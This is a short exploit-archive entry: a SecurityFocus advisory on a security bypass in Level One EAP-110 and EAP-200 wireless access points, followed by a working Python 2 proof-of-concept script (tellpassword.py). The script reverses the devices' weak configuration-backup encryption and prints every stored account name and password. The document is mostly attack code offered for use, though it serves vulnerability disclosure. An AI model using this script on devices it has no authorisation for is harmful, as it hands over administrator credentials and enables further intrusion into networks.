54 lines
No EOL
1.6 KiB
Python
Executable file
54 lines
No EOL
1.6 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/63168/info
|
|
|
|
Multiple Level One Enterprise Access Point devices are prone to a security bypass vulnerability.
|
|
|
|
Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks.
|
|
|
|
Level One EAP-110 and EAP-200 running firmware 2.00.03 build 1.50-1.5045 are vulnerable; other versions may also be affected.
|
|
|
|
# tellpassword.py
|
|
#
|
|
# Extracts user accounts from Level1 (ip4net)
|
|
# EAP-200 (and other) Wifi Access Points
|
|
#
|
|
# (c) 2013 sigma star gmbh
|
|
|
|
import sys, re
|
|
|
|
attribRegex = re.compile(r"(\w+)=\"([^\"]*)\"")
|
|
|
|
if (len(sys.argv) != 2):
|
|
print "USAGE: %s config-backup.conf" % sys.argv[0]
|
|
exit(1)
|
|
|
|
# decrypt config
|
|
encrypted = open(sys.argv[1], 'rb')
|
|
plain = open('plain.xml', 'w')
|
|
cntr = 0
|
|
encrypted.seek(128)
|
|
byte = encrypted.read(1)
|
|
print "Decrypting config file into plain.xml"
|
|
while byte:
|
|
plainOrd = ((ord(byte) ^ 0xff) + cntr) % 0x80
|
|
plain.write(chr(plainOrd))
|
|
cntr = (cntr + 1) % 0x40
|
|
byte = encrypted.read(1)
|
|
encrypted.close()
|
|
plain.close()
|
|
|
|
# find user accounts
|
|
print "Parsing accounts..."
|
|
plain = open('plain.xml', 'r')
|
|
for line in plain:
|
|
if "<user" in line:
|
|
user = None
|
|
password = None
|
|
for match in attribRegex.finditer(line):
|
|
attrib = match.group(1)
|
|
if attrib == "name":
|
|
user = match.group(2)
|
|
elif attrib == "password":
|
|
password = match.group(2)
|
|
if len(password) > 0:
|
|
print " - %s: %s" % (user, password)
|
|
plain.close() |